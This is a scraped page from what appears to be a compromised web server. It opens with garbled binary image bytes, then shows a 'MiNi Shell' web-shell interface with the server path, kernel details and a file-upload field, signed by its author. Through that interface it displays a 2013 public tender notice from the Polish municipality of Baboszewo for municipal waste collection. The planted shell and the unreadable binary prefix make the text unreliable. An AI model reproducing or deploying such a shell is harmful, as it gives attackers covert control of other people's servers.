JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130529/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130529/209196-N-2013.html

<p class="kh_header"><b>Baboszewo: Odbiór i zagospodarowanie odpadów komunalnych z terenu Gminy Baboszewo.</b><br>
<b>Numer ogłoszenia: 209196 - 2013; data zamieszczenia: 29.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Baboszewo , ul. Warszawska 9A, 09-130 Baboszewo, woj. mazowieckie, tel. 23 6611091, 6611092, 6611082, faks 23 6611071.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugbaboszewo.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu Gminy Baboszewo..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Ogólne dane ilościowe dotyczące przedmiotu zamówienia:	
1)  Liczba mieszkańców zameldowanych na terenie gminy Baboszewo - 8200 osób (wg stanu na   
    dzień 31.12.2012 r.)
2) liczba  nieruchomości rolniczych i jednorodzinnych - 2000 z możliwością zmniejszenia lub zwiększenia              
    w okresie realizacji umowy  +/-  5%.
3) liczba budynków wielolokalowych - 15	
4) Przewidywana ilość zmieszanych odpadów komunalnych do  odbioru w okresie trwania umowy 1800 Mg,               
    a ilość odpadów segregowanych  - 180 Mg z możliwością zmniejszenia lub zwiększenia w okresie realizacji 
   umowy +/-   5%.
Szczegółowy wykazy nieruchomości wraz z liczbą mieszkańców zamieszkujących daną
nieruchomość będą przekazywane Wykonawcy w toku realizacji zamówienia.

2. Zamówienie obejmuje:
1)	odbierania odpadów komunalnych z nieruchomości zamieszkałych oraz punktów na terenie Gminy Baboszewo,  w tym:
- odpadów komunalnych niesegregowanych (zmieszanych), 
- odpadów komunalnych zbieranymi w sposób zmieszany z wyodrębnieniem frakcji biodegradowalnej,
 	- odpadów zebranych w sposób selektywny z wyznaczonych punktów na terenie Gminy Baboszewo.
2)	Prowadzenia Mobilnego Punktu Selektywnego Zbierania Odpadów Komunalnych, w którym będą zbierane następujące rodzaje odpadów:
-	meble i inne odpady wielkogabarytowe,
-	zużyty sprzęt elektryczny i elektroniczny,
-	zużyte opony,
-	zużyte baterie i akumulatory,
-	odpady budowlane i rozbiórkowe,
-	przeterminowane leki,
-	resztki farb, lakierów, klejów, żywic, środków do konserwacji i ochrony drewna oraz opakowania po nich,
-	rozpuszczalniki, środki czyszczące  i opakowania po nich,
-	zbiorniki po aerozolach, pozostałości po domowych środkach dezynfekcji i dezynsekcji oraz opakowań po nich,
-	lampy fluorescencyjne i inne odpady zawierające rtęć, w tym świetlówki, termometry, przełączniki,
-	baterie i akumulatory,
-	zużyte kartridże i tonery,
-	przepracowane oleje. 
3)	Wyposażenie nieruchomości w pojemniki na odpady niesegregowane (zamieszane), oraz wymiana pojemników z terenu nieruchomości wg dostarczonego przez Zamawiającego wykazu.
        3.1.Wyposażenie:
       a) liczba pojemników na odpady podlegające selektywnej zbiórce przy nieruchomościach wielorodzinnych(tzw. dzwonów) -  w posiadaniu Zamawiającego  9 szt. Nie przewiduję się  w tym zakresie dodatkowego doposażenia przez Wykonawcę.
       b) liczba pojemników na odpady niesegregowane (zmieszane) o poj. 120 l
        - w posiadaniu Zamawiającego (wyposażenie nieruchomości) -861 szt.
        - do wyposażenia  przez Wykonawcę - 220 szt.
       c) liczba pojemników na odpady niesegregowane (zmieszane)  o poj. 240 l. 
       - w posiadaniu Zamawiającego (wyposażenie nieruchomości) - 564 szt.
       - do wyposażenia przez Wykonawcę - 400 szt.
       d) liczba pojemników na odpady niesegregowane (zmieszane) o poj.  1100l 
       - w posiadaniu Zamawiającego 1 szt.
       - do wyposażenia przez Wykonawcę - 6 szt.  
       e) liczba pojemników na odpady niesegregowane (zmieszane) o poj.  6500 l 
       - w posiadaniu Zamawiającego 0 szt.
      - do wyposażenia przez Wykonawcę - 4 szt.  
     f) liczba pojemników na odpady segregowane o poj.  od 6,5 m3 do 7,2 m3   -  do Punktu Selektywnej Zbiórki Odpadów Komunalnych (PSZOK).
      - w posiadaniu Zamawiającego 0 szt.
      - do wyposażenia przez Wykonawcę - 6 szt.
     
      3.2 Wymiana pojemników (z nieruchomości zaopatrzonych w pojemniki).
       - wymiana pojemników 120 l na 240 l  - 400 szt.
	- wymiana pojemników 240 l na 120 l -  250 szt.
SZCZEGÓŁOWY OPIS ZAMÓWIENIA ZAWIERA ZAŁĄCZNIK Nr I do SIWZ.
 3. Wykonawca zobowiązany jest do wykonywania usług stanowiących przedmiot zamówienia zgodnie         z obowiązującymi przepisami a w szczególności:
      -  z  ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U. z 2012 r.  poz.391 ze zmianami).
       - z rozporządzeniem Ministra Środowiska  z dnia 29 maja 2012 r.  w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r poz. 645)
      - z rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U. z 2013 r. poz.122)
          - Uchwała Nr XVII/155/2012 Rady Gminy Baboszewo z dnia 28.12 2012 r.  w sprawie uchwalenia 
            regulaminu utrzymania czystości i porządku na terenie Gminy Baboszewo(dostępna na stronie 
             internetowej Zamawiającego  www.ugbaboszewo.bip.org.pl)
          - odbieranie i transportowanie odpadów pojazdami bezpylnymi i kontenerowymi zgodnie z
            art. 61 ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2005 r. Nr
      108, poz. 908 z późn. zm.)
    - Wykonawca zobowiązany jest do osiągnięcia poziomów o których mowa w rozporządzeniu Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz.U z 2012 r. poz. 676).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.51.40.00-3, 34.92.84.80-6, 90.53.30.00-2, 90.50.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. WADIUM  -   20 000,00 zł  (słownie:  - dwadzieścia tysięcy złotych- ) 
         Wadium należy wnieść zgodnie z art. 45 ust. 6 ustawy - Prawo zamówień publicznych, w jednej lub kilku 
         następujących formach:
         - pieniądzu,
         - poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że 
           poręczenie kasy jest zawsze poręczeniem pieniężnym;
         - gwarancjach bankowych,
         - gwarancjach ubezpieczeniowych. 
         - poręczeniach udzielonych przez podmiot, o których mowa w art.6b ust.5 pkt.2  ustawy z dnia 9 
           listopada  2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz.U. z 2007 r. Nr 42, poz.    
           275  z późniejszymi zmianami) 
      2.Wadium wnoszone w pieniądzu  wpłaca się  na rachunek bankowy Zamawiającego:   
         Bank Spółdzielczy w Płońsku o/Baboszewo  73 8230 0007 0005 6300 2000 0004.

      3.Do oferty należy załączyć dowód wniesienia wadium.
         a) w przypadku wadium wniesionego w pieniądzu należy załączyć kserokopię potwierdzoną za zgodność 
             z oryginałem dowodu dokonania przelewu bankowego na konto Zamawiającego.   
         b) w przypadku wadium wniesionego w innej formie niż pieniądz - oryginał właściwego dokumentu należy 
            odrębnie załączyć do oferty lub złożyć w kasie Urzędu Gminy Baboszewo. Natomiast kserokopię tego 
            dokumentu należy wpiąć  jako załącznik do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedsiębiorca odbierający odpady komunalne od właścicieli nieruchomości jest obowiązany do   uzyskania wpisu do rejestru w gminie, na terenie której zamierza odbierać odpady komunalne od właścicieli nieruchomości. Wymóg ten nakłada na Wykonawców art.9c ustawy o utrzymaniu czystości i porządku                     w gminach.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał  lub wykonuje minimum trzy usługi
odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia o wartości nie mniejszej niż 
700 000 zł  brutto każda.

Za odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia Zamawiający uzna usługę
obejmującą  odbieranie odpadów komunalnych  od minimum 2000 właścicieli nieruchomości  lub od minimum 8000 osób, o czasie świadczenia nie krótszym niż 12 kolejnych miesięcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Wykonawca musi wykazać, że dysponuje lub będzie dysponować samochodami specjalistycznymi i samochodem ciężarowym, spełniającymi wymagania techniczne określone przepisami ustawy prawo o ruchu drogowym oraz innymi przepisami szczególnymi, w ilości określonej w § 3 rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości:
- co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych, 
- co najmniej dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych, 
- co najmniej jeden pojazd do odbierania odpadów bez funkcji kompaktującej.
	
Ze względu na ograniczoną szerokość dróg dojazdowych Zamawiający wymaga, aby Wykonawca dysponował  
co najmniej jednym pojazdem przystosowanym do odbioru odpadów komunalnych z możliwością wjazdu na drogi gruntowe o szerokości do 3 m.
 b)Wykonawca musi posiadać bazę magazynowo -transportowej zgodną  z wymogami określonymi  § 2 rozporządzenia Ministra  Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U. z 2013 r. poz.122).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje warunku dotyczącego osób zdolnych do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej    
        działalności gospodarczej  związanej z przedmiotem zamówienia.
                       Suma gwarancyjna min. 500 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz umowy zaakceptowany przez Wykonawcę /Załącznik Nr II.7/
   2) Dowód wniesienia wadium  - zgodnie z rozdziałem 8 SIWZ.
   3) W przypadku, gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia winni załączyć do oferty    
       dokument ustanowienia pełnomocnictwa zgodnie z art.23  u.P.z.p. i rozdziałem 10 pkt 7 SIWZ .
       W przypadku nie ustanowienia pełnomocnictwa oferta wraz z załącznikami winna być podpisana przez 
       wszystkich Wykonawców wspólnie składających ofertę tj. wszystkich członków konsorcjum lub wszystkich 
       wspólników spółki cywilnej. 
   4)W przypadku, gdy ofertę w imieniu wykonawcy podpisuje osoba inna niż określona w dokumentach     
      rejestrowych, do oferty należy załączyć dokument (pełnomocnictwo), z którego będzie wynikać zakres 
      umocowania.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugbaboszewo.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Baboszewo, 09-130 Baboszewo, ul. Warszawska 9 a,  pok. nr 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2013 godzina 11:00, miejsce: Urząd Gminy Baboszewo, 09-130 Baboszewo, ul. Warszawska 9A
(pokój nr 4 - SEKRETARIAT).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com